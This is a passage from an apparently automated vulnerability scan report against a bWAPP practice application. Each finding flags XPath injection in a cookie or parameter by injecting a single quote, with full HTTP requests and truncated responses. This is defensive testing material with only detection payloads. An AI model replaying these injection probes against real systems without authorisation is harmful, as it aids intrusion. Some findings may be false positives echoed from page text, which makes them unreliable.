X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.136. http://192.168.52.147/bWAPP/sqli_1.php [admin cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:52 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.137. http://192.168.52.147/bWAPP/sqli_1.php [bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:49 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.138. http://192.168.52.147/bWAPP/sqli_1.php [form_bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:03 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.139. http://192.168.52.147/bWAPP/sqli_1.php [form_security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:05 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13475

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.140. http://192.168.52.147/bWAPP/sqli_1.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:39 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.141. http://192.168.52.147/bWAPP/sqli_1.php [name of an arbitrarily supplied body parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:32 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.142. http://192.168.52.147/bWAPP/sqli_1.php [secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:38 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.143. http://192.168.52.147/bWAPP/sqli_1.php [security_level cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:28 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.144. http://192.168.52.147/bWAPP/sqli_1.php [security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:24 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13472

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.145. http://192.168.52.147/bWAPP/sqli_1.php [top_security_nossl cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_1.php

Issue detail

The top_security_nossl cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the top_security_nossl cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/sqli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/sqli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317'

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:05 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.146. http://192.168.52.147/bWAPP/xmli_1.php [admin cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/xmli_1.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/xmli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/xmli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:23:43 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.147. http://192.168.52.147/bWAPP/xmli_1.php [bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/xmli_1.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/xmli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/xmli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:22 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.148. http://192.168.52.147/bWAPP/xmli_1.php [form_bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/xmli_1.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/xmli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/xmli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:35 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.149. http://192.168.52.147/bWAPP/xmli_1.php [secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/xmli_1.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/xmli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/xmli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:18:06 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.150. http://192.168.52.147/bWAPP/xmli_1.php [security_level cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/xmli_1.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/xmli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/xmli_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:57 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.151. http://192.168.52.147/bWAPP/xss_eval.php [bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/xss_eval.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/xss_eval.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/xss_eval.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security=maybe

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:18:13 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.152. http://192.168.52.147/bWAPP/xss_eval.php [form_bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
